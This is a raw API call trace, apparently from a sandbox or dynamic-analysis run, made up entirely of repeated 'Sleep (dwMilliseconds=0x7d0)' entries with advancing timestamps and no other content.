Sleep (dwMilliseconds=0x7d0) [0256.704] Sleep (dwMilliseconds=0x7d0) [0256.711] Sleep (dwMilliseconds=0x7d0) [0256.712] Sleep (dwMilliseconds=0x7d0) [0256.717] Sleep (dwMilliseconds=0x7d0) [0256.719] Sleep (dwMilliseconds=0x7d0) [0256.724] Sleep (dwMilliseconds=0x7d0) [0256.726] Sleep (dwMilliseconds=0x7d0) [0256.732] Sleep (dwMilliseconds=0x7d0) [0256.734] Sleep (dwMilliseconds=0x7d0) [0256.738] Sleep (dwMilliseconds=0x7d0) [0256.740] Sleep (dwMilliseconds=0x7d0) [0256.746] Sleep (dwMilliseconds=0x7d0) [0256.752] Sleep (dwMilliseconds=0x7d0) [0256.759] Sleep (dwMilliseconds=0x7d0) [0256.761] Sleep (dwMilliseconds=0x7d0) [0256.766] Sleep (dwMilliseconds=0x7d0) [0256.773] Sleep (dwMilliseconds=0x7d0) [0256.775] Sleep (dwMilliseconds=0x7d0) [0256.778] Sleep (dwMilliseconds=0x7d0) [0256.780] Sleep (dwMilliseconds=0x7d0) [0256.782] Sleep (dwMilliseconds=0x7d0) [0256.787] Sleep (dwMilliseconds=0x7d0) [0256.795] Sleep (dwMilliseconds=0x7d0) [0256.803] Sleep (dwMilliseconds=0x7d0) [0256.805] Sleep (dwMilliseconds=0x7d0) [0256.810] Sleep (dwMilliseconds=0x7d0) [0256.818] Sleep (dwMilliseconds=0x7d0) [0256.819] Sleep (dwMilliseconds=0x7d0) [0256.825] Sleep (dwMilliseconds=0x7d0) [0256.827] Sleep (dwMilliseconds=0x7d0) [0256.828] Sleep (dwMilliseconds=0x7d0) [0256.836] Sleep (dwMilliseconds=0x7d0) [0256.837] Sleep (dwMilliseconds=0x7d0) [0256.843] Sleep (dwMilliseconds=0x7d0) [0256.844] Sleep (dwMilliseconds=0x7d0) [0256.850] Sleep (dwMilliseconds=0x7d0) [0256.857] Sleep (dwMilliseconds=0x7d0) [0256.859] Sleep (dwMilliseconds=0x7d0) [0256.864] Sleep (dwMilliseconds=0x7d0) [0256.866] Sleep (dwMilliseconds=0x7d0) [0256.871] Sleep (dwMilliseconds=0x7d0) [0256.872] Sleep (dwMilliseconds=0x7d0) [0256.879] Sleep (dwMilliseconds=0x7d0) [0256.880] Sleep (dwMilliseconds=0x7d0) [0256.886] Sleep (dwMilliseconds=0x7d0) [0256.893] Sleep (dwMilliseconds=0x7d0) [0256.894] Sleep (dwMilliseconds=0x7d0) [0256.899] Sleep (dwMilliseconds=0x7d0) [0256.907] Sleep (dwMilliseconds=0x7d0) [0256.913] Sleep (dwMilliseconds=0x7d0) [0256.915] Sleep (dwMilliseconds=0x7d0) [0256.919] Sleep (dwMilliseconds=0x7d0) [0256.921] Sleep (dwMilliseconds=0x7d0) [0256.926] Sleep (dwMilliseconds=0x7d0) [0256.934] Sleep (dwMilliseconds=0x7d0) [0256.940] Sleep (dwMilliseconds=0x7d0) [0256.946] Sleep (dwMilliseconds=0x7d0) [0256.948] Sleep (dwMilliseconds=0x7d0) [0256.953] Sleep (dwMilliseconds=0x7d0) [0256.954] Sleep (dwMilliseconds=0x7d0) [0256.959] Sleep (dwMilliseconds=0x7d0) [0256.961] Sleep (dwMilliseconds=0x7d0) [0256.962] Sleep (dwMilliseconds=0x7d0) [0256.967] Sleep (dwMilliseconds=0x7d0) [0256.974] Sleep (dwMilliseconds=0x7d0) [0256.980] Sleep (dwMilliseconds=0x7d0) [0256.982] Sleep (dwMilliseconds=0x7d0) [0256.987] Sleep (dwMilliseconds=0x7d0) [0256.988] Sleep (dwMilliseconds=0x7d0) [0256.995] Sleep (dwMilliseconds=0x7d0) [0257.009] Sleep (dwMilliseconds=0x7d0) [0257.010] Sleep (dwMilliseconds=0x7d0) [0257.014] Sleep (dwMilliseconds=0x7d0) [0257.017] Sleep (dwMilliseconds=0x7d0) [0257.019] Sleep (dwMilliseconds=0x7d0) [0257.024] Sleep (dwMilliseconds=0x7d0) [0257.031] Sleep (dwMilliseconds=0x7d0) [0257.032] Sleep (dwMilliseconds=0x7d0) [0257.039] Sleep (dwMilliseconds=0x7d0) [0257.046] Sleep (dwMilliseconds=0x7d0) [0257.048] Sleep (dwMilliseconds=0x7d0) [0257.055] Sleep (dwMilliseconds=0x7d0) [0257.059] Sleep (dwMilliseconds=0x7d0) [0257.062] Sleep (dwMilliseconds=0x7d0) [0257.066] Sleep (dwMilliseconds=0x7d0) [0257.067] Sleep (dwMilliseconds=0x7d0) [0257.074] Sleep (dwMilliseconds=0x7d0) [0257.080] Sleep (dwMilliseconds=0x7d0) [0257.082] Sleep (dwMilliseconds=0x7d0) [0257.087] Sleep (dwMilliseconds=0x7d0) [0257.089] Sleep (dwMilliseconds=0x7d0) [0257.094] Sleep (dwMilliseconds=0x7d0) [0257.095] Sleep (dwMilliseconds=0x7d0) [0257.102] Sleep (dwMilliseconds=0x7d0) [0257.105] Sleep (dwMilliseconds=0x7d0) [0257.108] Sleep (dwMilliseconds=0x7d0) [0257.111] Sleep (dwMilliseconds=0x7d0) [0257.113] Sleep (dwMilliseconds=0x7d0) [0257.119] Sleep (dwMilliseconds=0x7d0) [0257.121] Sleep (dwMilliseconds=0x7d0) [0257.127] Sleep (dwMilliseconds=0x7d0) [0257.128] Sleep (dwMilliseconds=0x7d0) [0257.136] Sleep (dwMilliseconds=0x7d0) [0257.144] Sleep (dwMilliseconds=0x7d0) [0257.151] Sleep (dwMilliseconds=0x7d0) [0257.152] Sleep (dwMilliseconds=0x7d0) [0257.154] Sleep (dwMilliseconds=0x7d0) [0257.160] Sleep (dwMilliseconds=0x7d0) [0257.161] Sleep (dwMilliseconds=0x7d0) [0257.167] Sleep (dwMilliseconds=0x7d0) [0257.169] Sleep (dwMilliseconds=0x7d0) [0257.175] Sleep (dwMilliseconds=0x7d0) [0257.183] Sleep (dwMilliseconds=0x7d0) [0257.190] Sleep (dwMilliseconds=0x7d0) [0257.198] Sleep (dwMilliseconds=0x7d0) [0257.205] Sleep (dwMilliseconds=0x7d0) [0257.207] Sleep (dwMilliseconds=0x7d0) [0257.213] Sleep (dwMilliseconds=0x7d0) [0257.214] Sleep (dwMilliseconds=0x7d0) [0257.221] Sleep (dwMilliseconds=0x7d0) [0257.233] Sleep (dwMilliseconds=0x7d0) [0257.235] Sleep (dwMilliseconds=0x7d0) [0257.241] Sleep (dwMilliseconds=0x7d0) [0257.242] Sleep (dwMilliseconds=0x7d0) [0257.247] Sleep (dwMilliseconds=0x7d0) [0257.249] Sleep (dwMilliseconds=0x7d0) [0257.250] Sleep (dwMilliseconds=0x7d0) [0257.255] Sleep (dwMilliseconds=0x7d0) [0257.256] Sleep (dwMilliseconds=0x7d0) [0257.262] Sleep (dwMilliseconds=0x7d0) [0257.263] Sleep (dwMilliseconds=0x7d0) [0257.269] Sleep (dwMilliseconds=0x7d0) [0257.275] Sleep (dwMilliseconds=0x7d0) [0257.282] Sleep (dwMilliseconds=0x7d0) [0257.283] Sleep (dwMilliseconds=0x7d0) [0257.290] Sleep (dwMilliseconds=0x7d0) [0257.292] Sleep (dwMilliseconds=0x7d0) [0257.296] Sleep (dwMilliseconds=0x7d0) [0257.302] Sleep (dwMilliseconds=0x7d0) [0257.303] Sleep (dwMilliseconds=0x7d0) [0257.309] Sleep (dwMilliseconds=0x7d0) [0257.310] Sleep (dwMilliseconds=0x7d0) [0257.315] Sleep (dwMilliseconds=0x7d0) [0257.321] Sleep (dwMilliseconds=0x7d0) [0257.322] Sleep (dwMilliseconds=0x7d0) [0257.328] Sleep (dwMilliseconds=0x7d0) [0257.336] Sleep (dwMilliseconds=0x7d0) [0257.337] Sleep (dwMilliseconds=0x7d0) [0257.343] Sleep (dwMilliseconds=0x7d0) [0257.345] Sleep (dwMilliseconds=0x7d0) [0257.362] Sleep (dwMilliseconds=0x7d0) [0257.363] Sleep (dwMilliseconds=0x7d0) [0257.373] Sleep (dwMilliseconds=0x7d0) [0257.383] Sleep (dwMilliseconds=0x7d0) [0257.390] Sleep (dwMilliseconds=0x7d0) [0257.393] Sleep (dwMilliseconds=0x7d0) [0257.410] Sleep (dwMilliseconds=0x7d0) [0257.422] Sleep (dwMilliseconds=0x7d0) [0257.423] Sleep (dwMilliseconds=0x7d0) [0257.433] Sleep (dwMilliseconds=0x7d0) [0257.434] Sleep (dwMilliseconds=0x7d0) [0257.441] Sleep (dwMilliseconds=0x7d0) [0257.445] Sleep (dwMilliseconds=0x7d0) [0257.455] Sleep (dwMilliseconds=0x7d0) [0257.466] Sleep (dwMilliseconds=0x7d0) [0257.468] Sleep (dwMilliseconds=0x7d0) [0257.475] Sleep (dwMilliseconds=0x7d0) [0257.476] Sleep (dwMilliseconds=0x7d0) [0257.482] Sleep (dwMilliseconds=0x7d0) [0257.483] Sleep (dwMilliseconds=0x7d0) [0257.485] Sleep (dwMilliseconds=0x7d0) [0257.491] Sleep (dwMilliseconds=0x7d0) [0257.498] Sleep (dwMilliseconds=0x7d0) [0257.505] Sleep (dwMilliseconds=0x7d0) [0257.506] Sleep (dwMilliseconds=0x7d0) [0257.512] Sleep (dwMilliseconds=0x7d0) [0257.513] Sleep (dwMilliseconds=0x7d0) [0257.519] Sleep (dwMilliseconds=0x7d0) [0257.526] Sleep (dwMilliseconds=0x7d0) [0257.528] Sleep (dwMilliseconds=0x7d0) [0257.530] Sleep (dwMilliseconds=0x7d0) [0257.533] Sleep (dwMilliseconds=0x7d0) [0257.536] Sleep (dwMilliseconds=0x7d0) [0257.541] Sleep (dwMilliseconds=0x7d0) [0257.543] Sleep (dwMilliseconds=0x7d0) [0257.549] Sleep (dwMilliseconds=0x7d0) [0257.550] Sleep (dwMilliseconds=0x7d0) [0257.555] Sleep (dwMilliseconds=0x7d0) [0257.562] Sleep (dwMilliseconds=0x7d0) [0257.563] Sleep (dwMilliseconds=0x7d0) [0257.569] Sleep (dwMilliseconds=0x7d0) [0257.575] Sleep (dwMilliseconds=0x7d0) [0257.577] Sleep (dwMilliseconds=0x7d0) [0257.639] Sleep (dwMilliseconds=0x7d0) [0257.650] Sleep (dwMilliseconds=0x7d0) [0257.657] Sleep (dwMilliseconds=0x7d0) [0257.658] Sleep (dwMilliseconds=0x7d0) [0257.669] Sleep (dwMilliseconds=0x7d0) [0257.673] Sleep (dwMilliseconds=0x7d0) [0257.679] Sleep (dwMilliseconds=0x7d0) [0257.680] Sleep (dwMilliseconds=0x7d0) [0257.688] Sleep (dwMilliseconds=0x7d0) [0257.692] Sleep (dwMilliseconds=0x7d0) [0257.695] Sleep (dwMilliseconds=0x7d0) [0257.696] Sleep (dwMilliseconds=0x7d0) [0257.703] Sleep (dwMilliseconds=0x7d0) [0257.710] Sleep (dwMilliseconds=0x7d0) [0257.711] Sleep (dwMilliseconds=0x7d0) [0257.717] Sleep (dwMilliseconds=0x7d0) [0257.724] Sleep (dwMilliseconds=0x7d0) [0257.731] Sleep (dwMilliseconds=0x7d0) [0257.733] Sleep (dwMilliseconds=0x7d0) [0257.741] Sleep (dwMilliseconds=0x7d0) [0257.744] Sleep (dwMilliseconds=0x7d0) [0257.745] Sleep (dwMilliseconds=0x7d0) [0257.751] Sleep (dwMilliseconds=0x7d0) [0257.752] Sleep (dwMilliseconds=0x7d0) [0257.758] Sleep (dwMilliseconds=0x7d0) [0257.759] Sleep (dwMilliseconds=0x7d0) [0257.765] Sleep (dwMilliseconds=0x7d0) [0257.766] Sleep (dwMilliseconds=0x7d0) [0257.775] Sleep (dwMilliseconds=0x7d0) [0257.777] Sleep (dwMilliseconds=0x7d0) [0257.783] Sleep (dwMilliseconds=0x7d0) [0257.784] Sleep (dwMilliseconds=0x7d0) [0257.799] Sleep (dwMilliseconds=0x7d0) [0257.806] Sleep (dwMilliseconds=0x7d0) [0257.816] Sleep (dwMilliseconds=0x7d0) [0257.818] Sleep (dwMilliseconds=0x7d0) [0257.824] Sleep (dwMilliseconds=0x7d0) [0257.831] Sleep (dwMilliseconds=0x7d0) [0257.833] Sleep (dwMilliseconds=0x7d0) [0257.839] Sleep (dwMilliseconds=0x7d0) [0257.845] Sleep (dwMilliseconds=0x7d0) [0257.847] Sleep (dwMilliseconds=0x7d0) [0257.863] Sleep (dwMilliseconds=0x7d0) [0257.875] Sleep (dwMilliseconds=0x7d0) [0257.889] Sleep (dwMilliseconds=0x7d0) [0257.895] Sleep (dwMilliseconds=0x7d0) [0257.896] Sleep (dwMilliseconds=0x7d0) [0257.901] Sleep (dwMilliseconds=0x7d0) [0257.903] Sleep (dwMilliseconds=0x7d0) [0257.911] Sleep (dwMilliseconds=0x7d0) [0257.912] Sleep (dwMilliseconds=0x7d0) [0257.918] Sleep (dwMilliseconds=0x7d0) [0257.924] Sleep (dwMilliseconds=0x7d0) [0257.927] Sleep (dwMilliseconds=0x7d0) [0257.930] Sleep (dwMilliseconds=0x7d0) [0257.937] Sleep (dwMilliseconds=0x7d0) [0257.945] Sleep (dwMilliseconds=0x7d0) [0257.951] Sleep (dwMilliseconds=0x7d0) [0257.952] Sleep (dwMilliseconds=0x7d0) [0257.958] Sleep (dwMilliseconds=0x7d0) [0257.959] Sleep (dwMilliseconds=0x7d0) [0257.965] Sleep (dwMilliseconds=0x7d0) [0257.966] Sleep (dwMilliseconds=0x7d0) [0257.971] Sleep (dwMilliseconds=0x7d0) [0257.973] Sleep (dwMilliseconds=0x7d0) [0257.979] Sleep (dwMilliseconds=0x7d0) [0257.981] Sleep (dwMilliseconds=0x7d0) [0257.986] Sleep (dwMilliseconds=0x7d0) [0257.987] Sleep (dwMilliseconds=0x7d0) [0258.019] Sleep (dwMilliseconds=0x7d0) [0258.024] Sleep (dwMilliseconds=0x7d0) [0258.033] Sleep (dwMilliseconds=0x7d0) [0258.035] Sleep (dwMilliseconds=0x7d0) [0258.043] Sleep (dwMilliseconds=0x7d0) [0258.044] Sleep (dwMilliseconds=0x7d0) [0258.048] Sleep (dwMilliseconds=0x7d0) [0258.051] Sleep (dwMilliseconds=0x7d0) [0258.058] Sleep (dwMilliseconds=0x7d0) [0258.059] Sleep (dwMilliseconds=0x7d0) [0258.064] Sleep (dwMilliseconds=0x7d0) [0258.066] Sleep (dwMilliseconds=0x7d0) [0258.072] Sleep (dwMilliseconds=0x7d0) [0258.074] Sleep (dwMilliseconds=0x7d0) [0258.080] Sleep (dwMilliseconds=0x7d0) [0258.082] Sleep (dwMilliseconds=0x7d0) [0258.091] Sleep (dwMilliseconds=0x7d0) [0258.092] Sleep (dwMilliseconds=0x7d0) [0258.096] Sleep (dwMilliseconds=0x7d0) [0258.098] Sleep (dwMilliseconds=0x7d0) [0258.099] Sleep (dwMilliseconds=0x7d0) [0258.105] Sleep (dwMilliseconds=0x7d0) [0258.106] Sleep (dwMilliseconds=0x7d0) [0258.112] Sleep (dwMilliseconds=0x7d0) [0258.114] Sleep (dwMilliseconds=0x7d0) [0258.120] Sleep (dwMilliseconds=0x7d0) [0258.127] Sleep (dwMilliseconds=0x7d0) [0258.128] Sleep (dwMilliseconds=0x7d0) [0258.134] Sleep (dwMilliseconds=0x7d0) [0258.135] Sleep (dwMilliseconds=0x7d0) [0258.140] Sleep (dwMilliseconds=0x7d0) [0258.143] Sleep (dwMilliseconds=0x7d0) [0258.144] Sleep (dwMilliseconds=0x7d0) [0258.152] Sleep (dwMilliseconds=0x7d0) [0258.157] Sleep (dwMilliseconds=0x7d0) [0258.166] Sleep (dwMilliseconds=0x7d0) [0258.167] Sleep (dwMilliseconds=0x7d0) [0258.175] Sleep (dwMilliseconds=0x7d0) [0258.177] Sleep (dwMilliseconds=0x7d0) [0258.186] Sleep (dwMilliseconds=0x7d0) [0258.189] Sleep (dwMilliseconds=0x7d0) [0258.193] Sleep (dwMilliseconds=0x7d0) [0258.194] Sleep (dwMilliseconds=0x7d0) [0258.203] Sleep (dwMilliseconds=0x7d0) [0258.204] Sleep (dwMilliseconds=0x7d0) [0258.212] Sleep (dwMilliseconds=0x7d0) [0258.248] Sleep (dwMilliseconds=0x7d0) [0258.250] Sleep (dwMilliseconds=0x7d0) [0258.256] Sleep (dwMilliseconds=0x7d0) [0258.258] Sleep (dwMilliseconds=0x7d0) [0258.264] Sleep (dwMilliseconds=0x7d0) [0258.266] Sleep (dwMilliseconds=0x7d0) [0258.273] Sleep (dwMilliseconds=0x7d0) [0258.279] Sleep (dwMilliseconds=0x7d0) [0258.281] Sleep (dwMilliseconds=0x7d0) [0258.286] Sleep (dwMilliseconds=0x7d0) [0258.287] Sleep (dwMilliseconds=0x7d0) [0258.292] Sleep (dwMilliseconds=0x7d0) [0258.299] Sleep (dwMilliseconds=0x7d0) [0258.301] Sleep (dwMilliseconds=0x7d0) [0258.307] Sleep (dwMilliseconds=0x7d0) [0258.308] Sleep (dwMilliseconds=0x7d0) [0258.310] Sleep (dwMilliseconds=0x7d0) [0258.314] Sleep (dwMilliseconds=0x7d0) [0258.320] Sleep (dwMilliseconds=0x7d0) [0258.321] Sleep (dwMilliseconds=0x7d0) [0258.327] Sleep (dwMilliseconds=0x7d0) [0258.328] Sleep (dwMilliseconds=0x7d0) [0258.334] Sleep (dwMilliseconds=0x7d0) [0258.336] Sleep (dwMilliseconds=0x7d0) [0258.343] Sleep (dwMilliseconds=0x7d0) [0258.344] Sleep (dwMilliseconds=0x7d0) [0258.358] Sleep (dwMilliseconds=0x7d0) [0258.359] Sleep (dwMilliseconds=0x7d0) [0258.362] Sleep (dwMilliseconds=0x7d0) [0258.366] Sleep (dwMilliseconds=0x7d0) [0258.367] Sleep (dwMilliseconds=0x7d0) [0258.374] Sleep (dwMilliseconds=0x7d0) [0258.387] Sleep (dwMilliseconds=0x7d0) [0258.398] Sleep (dwMilliseconds=0x7d0) [0258.399] Sleep (dwMilliseconds=0x7d0) [0258.405] Sleep (dwMilliseconds=0x7d0) [0258.407] Sleep (dwMilliseconds=0x7d0) [0258.413] Sleep (dwMilliseconds=0x7d0) [0258.414] Sleep (dwMilliseconds=0x7d0) [0258.421] Sleep (dwMilliseconds=0x7d0) [0258.422] Sleep (dwMilliseconds=0x7d0) [0258.428] Sleep (dwMilliseconds=0x7d0) [0258.430] Sleep (dwMilliseconds=0x7d0) [0258.437] Sleep (dwMilliseconds=0x7d0) [0258.445] Sleep (dwMilliseconds=0x7d0) [0258.453] Sleep (dwMilliseconds=0x7d0) [0258.454] Sleep (dwMilliseconds=0x7d0) [0258.460] Sleep (dwMilliseconds=0x7d0) [0258.466] Sleep (dwMilliseconds=0x7d0) [0258.468] Sleep (dwMilliseconds=0x7d0) [0258.473] Sleep (dwMilliseconds=0x7d0) [0258.475] Sleep (dwMilliseconds=0x7d0) [0258.480] Sleep (dwMilliseconds=0x7d0) [0258.482] Sleep (dwMilliseconds=0x7d0) [0258.487] Sleep (dwMilliseconds=0x7d0) [0258.489] Sleep (dwMilliseconds=0x7d0) [0258.494] Sleep (dwMilliseconds=0x7d0) [0258.496] Sleep (dwMilliseconds=0x7d0) [0258.498] Sleep (dwMilliseconds=0x7d0) [0258.502] Sleep (dwMilliseconds=0x7d0) [0258.503] Sleep (dwMilliseconds=0x7d0) [0258.509] Sleep (dwMilliseconds=0x7d0) [0258.510] Sleep (dwMilliseconds=0x7d0) [0258.516] Sleep (dwMilliseconds=0x7d0) [0258.523] Sleep (dwMilliseconds=0x7d0) [0258.525] Sleep (dwMilliseconds=0x7d0) [0258.532] Sleep (dwMilliseconds=0x7d0) [0258.534] Sleep (dwMilliseconds=0x7d0) [0258.543] Sleep (dwMilliseconds=0x7d0) [0258.544] Sleep (dwMilliseconds=0x7d0) [0258.549] Sleep (dwMilliseconds=0x7d0) [0258.551] Sleep (dwMilliseconds=0x7d0) [0258.558] Sleep (dwMilliseconds=0x7d0) [0258.563] Sleep (dwMilliseconds=0x7d0) [0258.565] Sleep (dwMilliseconds=0x7d0) [0258.570] Sleep (dwMilliseconds=0x7d0) [0258.572] Sleep (dwMilliseconds=0x7d0) [0258.578] Sleep (dwMilliseconds=0x7d0) [0258.579] Sleep (dwMilliseconds=0x7d0) [0258.585] Sleep (dwMilliseconds=0x7d0) [0258.587] Sleep (dwMilliseconds=0x7d0) [0258.588] Sleep (dwMilliseconds=0x7d0) [0258.629] Sleep (dwMilliseconds=0x7d0) [0258.636] Sleep (dwMilliseconds=0x7d0) [0258.638] Sleep (dwMilliseconds=0x7d0) [0258.648] Sleep (dwMilliseconds=0x7d0) [0258.656] Sleep (dwMilliseconds=0x7d0) [0258.666] Sleep (dwMilliseconds=0x7d0) [0258.668] Sleep (dwMilliseconds=0x7d0) [0258.676] Sleep (dwMilliseconds=0x7d0) [0258.678] Sleep (dwMilliseconds=0x7d0) [0258.687] Sleep (dwMilliseconds=0x7d0) [0258.689] Sleep (dwMilliseconds=0x7d0) [0258.698] Sleep (dwMilliseconds=0x7d0) [0258.700] Sleep (dwMilliseconds=0x7d0) [0258.708] Sleep (dwMilliseconds=0x7d0) [0258.711] Sleep (dwMilliseconds=0x7d0) [0258.718] Sleep (dwMilliseconds=0x7d0) [0258.720] Sleep (dwMilliseconds=0x7d0) [0258.728] Sleep (dwMilliseconds=0x7d0) [0258.731] Sleep (dwMilliseconds=0x7d0) [0258.749] Sleep (dwMilliseconds=0x7d0) [0258.756] Sleep (dwMilliseconds=0x7d0) [0258.757] Sleep (dwMilliseconds=0x7d0) [0258.760] Sleep (dwMilliseconds=0x7d0) [0258.763] Sleep (dwMilliseconds=0x7d0) [0258.770] Sleep (dwMilliseconds=0x7d0) [0258.772] Sleep (dwMilliseconds=0x7d0) [0258.778] Sleep (dwMilliseconds=0x7d0) [0258.780] Sleep (dwMilliseconds=0x7d0) [0258.785] Sleep (dwMilliseconds=0x7d0) [0258.787] Sleep (dwMilliseconds=0x7d0) [0258.793] Sleep (dwMilliseconds=0x7d0) [0258.795] Sleep (dwMilliseconds=0x7d0) [0258.800] Sleep (dwMilliseconds=0x7d0) [0258.802] Sleep (dwMilliseconds=0x7d0) [0258.805] Sleep (dwMilliseconds=0x7d0) [0258.808] Sleep (dwMilliseconds=0x7d0) [0258.814] Sleep (dwMilliseconds=0x7d0) [0258.816] Sleep (dwMilliseconds=0x7d0) [0258.821] Sleep (dwMilliseconds=0x7d0) [0258.823] Sleep (dwMilliseconds=0x7d0) [0258.828] Sleep (dwMilliseconds=0x7d0) [0258.830] Sleep (dwMilliseconds=0x7d0) [0258.836] Sleep (dwMilliseconds=0x7d0) [0258.844] Sleep (dwMilliseconds=0x7d0) [0258.849] Sleep (dwMilliseconds=0x7d0) [0258.852] Sleep (dwMilliseconds=0x7d0) [0258.858] Sleep (dwMilliseconds=0x7d0) [0258.860] Sleep (dwMilliseconds=0x7d0) [0258.866] Sleep (dwMilliseconds=0x7d0) [0258.872] Sleep (dwMilliseconds=0x7d0) [0258.874] Sleep (dwMilliseconds=0x7d0) [0258.879] Sleep (dwMilliseconds=0x7d0) [0258.886] Sleep (dwMilliseconds=0x7d0) [0258.887] Sleep (dwMilliseconds=0x7d0) [0258.892] Sleep (dwMilliseconds=0x7d0) [0258.894] Sleep (dwMilliseconds=0x7d0) [0258.900] Sleep (dwMilliseconds=0x7d0) [0258.907] Sleep (dwMilliseconds=0x7d0) [0258.908] Sleep (dwMilliseconds=0x7d0) [0258.914] Sleep (dwMilliseconds=0x7d0) [0258.916] Sleep (dwMilliseconds=0x7d0) [0258.921] Sleep (dwMilliseconds=0x7d0) [0258.923] Sleep (dwMilliseconds=0x7d0) [0258.928] Sleep (dwMilliseconds=0x7d0) [0258.930] Sleep (dwMilliseconds=0x7d0) [0258.936] Sleep (dwMilliseconds=0x7d0) [0258.946] Sleep (dwMilliseconds=0x7d0) [0258.953] Sleep (dwMilliseconds=0x7d0) [0258.954] Sleep (dwMilliseconds=0x7d0) [0258.960] Sleep (dwMilliseconds=0x7d0) [0258.962] Sleep (dwMilliseconds=0x7d0) [0258.968] Sleep (dwMilliseconds=0x7d0) [0258.969] Sleep (dwMilliseconds=0x7d0) [0258.976] Sleep (dwMilliseconds=0x7d0) [0258.982] Sleep (dwMilliseconds=0x7d0) [0258.984] Sleep (dwMilliseconds=0x7d0) [0258.990] Sleep (dwMilliseconds=0x7d0) [0258.992] Sleep (dwMilliseconds=0x7d0) [0258.998] Sleep (dwMilliseconds=0x7d0) [0259.004] Sleep (dwMilliseconds=0x7d0) [0259.006] Sleep (dwMilliseconds=0x7d0) [0259.011] Sleep (dwMilliseconds=0x7d0) [0259.013] Sleep (dwMilliseconds=0x7d0) [0259.019] Sleep (dwMilliseconds=0x7d0) [0259.025] Sleep (dwMilliseconds=0x7d0) [0259.027] Sleep (dwMilliseconds=0x7d0) [0259.035] Sleep (dwMilliseconds=0x7d0) [0259.037] Sleep (dwMilliseconds=0x7d0) [0259.043] Sleep (dwMilliseconds=0x7d0) [0259.044] Sleep (dwMilliseconds=0x7d0) [0259.051] Sleep (dwMilliseconds=0x7d0) [0259.057] Sleep (dwMilliseconds=0x7d0) [0259.058] Sleep (dwMilliseconds=0x7d0) [0259.072] Sleep (dwMilliseconds=0x7d0) [0259.082] Sleep (dwMilliseconds=0x7d0) [0259.088] Sleep (dwMilliseconds=0x7d0) [0259.090] Sleep (dwMilliseconds=0x7d0) [0259.100] Sleep (dwMilliseconds=0x7d0) [0259.116] Sleep (dwMilliseconds=0x7d0) [0259.117] Sleep (dwMilliseconds=0x7d0) [0259.123] Sleep (dwMilliseconds=0x7d0) [0259.127] Sleep (dwMilliseconds=0x7d0) [0259.131] Sleep (dwMilliseconds=0x7d0) [0259.133] Sleep (dwMilliseconds=0x7d0) [0259.139] Sleep (dwMilliseconds=0x7d0) [0259.147] Sleep (dwMilliseconds=0x7d0) [0259.148] Sleep (dwMilliseconds=0x7d0) [0259.182] Sleep (dwMilliseconds=0x7d0) [0259.186] Sleep (dwMilliseconds=0x7d0) [0259.192] Sleep (dwMilliseconds=0x7d0) [0259.201] Sleep (dwMilliseconds=0x7d0) [0259.202] Sleep (dwMilliseconds=0x7d0) [0259.203] Sleep (dwMilliseconds=0x7d0) [0259.208] Sleep (dwMilliseconds=0x7d0) [0259.209] Sleep (dwMilliseconds=0x7d0) [0259.217] Sleep (dwMilliseconds=0x7d0) [0259.221] Sleep (dwMilliseconds=0x7d0) [0259.227] Sleep (dwMilliseconds=0x7d0) [0259.234] Sleep (dwMilliseconds=0x7d0) [0259.235] Sleep (dwMilliseconds=0x7d0) [0259.242] Sleep (dwMilliseconds=0x7d0) [0259.249] Sleep (dwMilliseconds=0x7d0) [0259.252] Sleep (dwMilliseconds=0x7d0) [0259.256] Sleep (dwMilliseconds=0x7d0) [0259.270] Sleep (dwMilliseconds=0x7d0) [0259.271] Sleep (dwMilliseconds=0x7d0) [0259.278] Sleep (dwMilliseconds=0x7d0) [0259.280] Sleep (dwMilliseconds=0x7d0) [0259.286] Sleep (dwMilliseconds=0x7d0) [0259.295] Sleep (dwMilliseconds=0x7d0) [0259.296] Sleep (dwMilliseconds=0x7d0) [0259.323] Sleep (dwMilliseconds=0x7d0) [0259.328] Sleep (dwMilliseconds=0x7d0) [0259.335] Sleep (dwMilliseconds=0x7d0) [0259.336] Sleep (dwMilliseconds=0x7d0) [0259.342] Sleep (dwMilliseconds=0x7d0) [0259.346] Sleep (dwMilliseconds=0x7d0) [0259.361] Sleep (dwMilliseconds=0x7d0) [0259.367] Sleep (dwMilliseconds=0x7d0) [0259.368] Sleep (dwMilliseconds=0x7d0) [0259.377] Sleep (dwMilliseconds=0x7d0) [0259.378] Sleep (dwMilliseconds=0x7d0) [0259.380] Sleep (dwMilliseconds=0x7d0) [0259.385] Sleep (dwMilliseconds=0x7d0) [0259.386] Sleep (dwMilliseconds=0x7d0) [0259.393] Sleep (dwMilliseconds=0x7d0) [0259.394] Sleep (dwMilliseconds=0x7d0) [0259.400] Sleep (dwMilliseconds=0x7d0) [0259.402] Sleep (dwMilliseconds=0x7d0) [0259.408] Sleep (dwMilliseconds=0x7d0) [0259.409] Sleep (dwMilliseconds=0x7d0) [0259.416] Sleep (dwMilliseconds=0x7d0) [0259.422] Sleep (dwMilliseconds=0x7d0) [0259.424] Sleep (dwMilliseconds=0x7d0) [0259.425] Sleep (dwMilliseconds=0x7d0) [0259.430] Sleep (dwMilliseconds=0x7d0) [0259.431] Sleep (dwMilliseconds=0x7d0) [0259.437] Sleep (dwMilliseconds=0x7d0) [0259.444] Sleep (dwMilliseconds=0x7d0) [0259.450] Sleep (dwMilliseconds=0x7d0) [0259.457] Sleep (dwMilliseconds=0x7d0) [0259.458] Sleep (dwMilliseconds=0x7d0) [0259.464] Sleep (dwMilliseconds=0x7d0) [0259.465] Sleep (dwMilliseconds=0x7d0) [0259.470] Sleep (dwMilliseconds=0x7d0) [0259.474] Sleep (dwMilliseconds=0x7d0) [0259.475] Sleep (dwMilliseconds=0x7d0) [0259.481] Sleep (dwMilliseconds=0x7d0) [0259.482] Sleep (dwMilliseconds=0x7d0) [0259.494] Sleep (dwMilliseconds=0x7d0) [0259.495] Sleep (dwMilliseconds=0x7d0) [0259.501] Sleep (dwMilliseconds=0x7d0) [0259.508] Sleep (dwMilliseconds=0x7d0) [0259.513] Sleep (dwMilliseconds=0x7d0) [0259.516] Sleep (dwMilliseconds=0x7d0) [0259.522] Sleep (dwMilliseconds=0x7d0) [0259.524] Sleep (dwMilliseconds=0x7d0) [0259.529] Sleep (dwMilliseconds=0x7d0) [0259.536] Sleep (dwMilliseconds=0x7d0) [0259.537] Sleep (dwMilliseconds=0x7d0) [0259.547] Sleep (dwMilliseconds=0x7d0) [0259.549] Sleep (dwMilliseconds=0x7d0) [0259.554] Sleep (dwMilliseconds=0x7d0) [0259.557] Sleep (dwMilliseconds=0x7d0) [0259.563] Sleep (dwMilliseconds=0x7d0) [0259.570] Sleep (dwMilliseconds=0x7d0) 